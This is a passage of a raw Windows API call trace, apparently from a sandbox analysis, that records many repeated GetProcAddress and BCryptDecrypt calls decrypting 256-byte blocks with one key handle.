GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.328] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e903, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e903, pcbResult=0x14f8fc) returned 0x0 [0173.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.330] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203e9f8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203e9f8, pcbResult=0x14f8fc) returned 0x0 [0173.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.331] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203eaed, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203eaed, pcbResult=0x14f8fc) returned 0x0 [0173.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.333] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203ebe2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203ebe2, pcbResult=0x14f8fc) returned 0x0 [0173.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.334] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203ecd7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203ecd7, pcbResult=0x14f8fc) returned 0x0 [0173.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.335] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203edcc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203edcc, pcbResult=0x14f8fc) returned 0x0 [0173.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.337] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7a9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203eec1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203eec1, pcbResult=0x14f8fc) returned 0x0 [0173.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.338] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7aad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203efb6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203efb6, pcbResult=0x14f8fc) returned 0x0 [0173.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.340] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7abd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f0ab, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f0ab, pcbResult=0x14f8fc) returned 0x0 [0173.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.341] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7acd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f1a0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f1a0, pcbResult=0x14f8fc) returned 0x0 [0173.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.342] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7add0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f295, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f295, pcbResult=0x14f8fc) returned 0x0 [0173.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.344] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7aed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f38a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f38a, pcbResult=0x14f8fc) returned 0x0 [0173.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.345] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7afd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f47f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f47f, pcbResult=0x14f8fc) returned 0x0 [0173.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.346] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f574, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f574, pcbResult=0x14f8fc) returned 0x0 [0173.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.348] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f669, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f669, pcbResult=0x14f8fc) returned 0x0 [0173.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.433] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f75e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f75e, pcbResult=0x14f8fc) returned 0x0 [0173.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.435] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f853, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f853, pcbResult=0x14f8fc) returned 0x0 [0173.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.436] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203f948, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203f948, pcbResult=0x14f8fc) returned 0x0 [0173.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.438] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203fa3d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203fa3d, pcbResult=0x14f8fc) returned 0x0 [0173.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.439] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203fb32, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203fb32, pcbResult=0x14f8fc) returned 0x0 [0173.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.440] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203fc27, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203fc27, pcbResult=0x14f8fc) returned 0x0 [0173.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.442] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203fd1c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203fd1c, pcbResult=0x14f8fc) returned 0x0 [0173.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.443] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7b9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203fe11, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203fe11, pcbResult=0x14f8fc) returned 0x0 [0173.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.444] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7bad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203ff06, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203ff06, pcbResult=0x14f8fc) returned 0x0 [0173.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.446] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7bbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x203fffb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x203fffb, pcbResult=0x14f8fc) returned 0x0 [0173.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.447] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7bcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20400f0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20400f0, pcbResult=0x14f8fc) returned 0x0 [0173.448] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.448] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7bdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20401e5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20401e5, pcbResult=0x14f8fc) returned 0x0 [0173.449] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.449] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7bed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20402da, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20402da, pcbResult=0x14f8fc) returned 0x0 [0173.451] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.451] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7bfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20403cf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20403cf, pcbResult=0x14f8fc) returned 0x0 [0173.452] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.452] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20404c4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20404c4, pcbResult=0x14f8fc) returned 0x0 [0173.454] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.454] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20405b9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20405b9, pcbResult=0x14f8fc) returned 0x0 [0173.455] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.455] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20406ae, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20406ae, pcbResult=0x14f8fc) returned 0x0 [0173.456] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.456] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20407a3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20407a3, pcbResult=0x14f8fc) returned 0x0 [0173.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.458] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040898, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040898, pcbResult=0x14f8fc) returned 0x0 [0173.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.459] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204098d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204098d, pcbResult=0x14f8fc) returned 0x0 [0173.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.460] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040a82, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040a82, pcbResult=0x14f8fc) returned 0x0 [0173.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.462] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040b77, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040b77, pcbResult=0x14f8fc) returned 0x0 [0173.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.463] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040c6c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040c6c, pcbResult=0x14f8fc) returned 0x0 [0173.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.464] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7c9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040d61, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040d61, pcbResult=0x14f8fc) returned 0x0 [0173.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.466] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7cad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040e56, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040e56, pcbResult=0x14f8fc) returned 0x0 [0173.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.567] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7cbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2040f4b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2040f4b, pcbResult=0x14f8fc) returned 0x0 [0173.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.569] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ccd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041040, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041040, pcbResult=0x14f8fc) returned 0x0 [0173.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.570] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7cdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041135, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041135, pcbResult=0x14f8fc) returned 0x0 [0173.571] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.571] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ced0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204122a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204122a, pcbResult=0x14f8fc) returned 0x0 [0173.573] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.573] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7cfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204131f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204131f, pcbResult=0x14f8fc) returned 0x0 [0173.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.574] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041414, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041414, pcbResult=0x14f8fc) returned 0x0 [0173.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.576] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041509, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041509, pcbResult=0x14f8fc) returned 0x0 [0173.577] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.577] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20415fe, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20415fe, pcbResult=0x14f8fc) returned 0x0 [0173.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.578] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20416f3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20416f3, pcbResult=0x14f8fc) returned 0x0 [0173.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.579] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20417e8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20417e8, pcbResult=0x14f8fc) returned 0x0 [0173.581] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.581] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20418dd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20418dd, pcbResult=0x14f8fc) returned 0x0 [0173.582] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.582] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20419d2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20419d2, pcbResult=0x14f8fc) returned 0x0 [0173.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.583] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041ac7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041ac7, pcbResult=0x14f8fc) returned 0x0 [0173.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.585] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041bbc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041bbc, pcbResult=0x14f8fc) returned 0x0 [0173.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.586] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7d9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041cb1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041cb1, pcbResult=0x14f8fc) returned 0x0 [0173.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.588] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7dad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041da6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041da6, pcbResult=0x14f8fc) returned 0x0 [0173.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.589] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7dbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041e9b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041e9b, pcbResult=0x14f8fc) returned 0x0 [0173.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.590] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7dcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2041f90, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2041f90, pcbResult=0x14f8fc) returned 0x0 [0173.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0173.592] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e7ddd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2042085, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2042085, pcbResult=0x14f8fc) returned 0x0 [0173.593] GetProcAddress (hModule=0x7ffc5bcc0000, 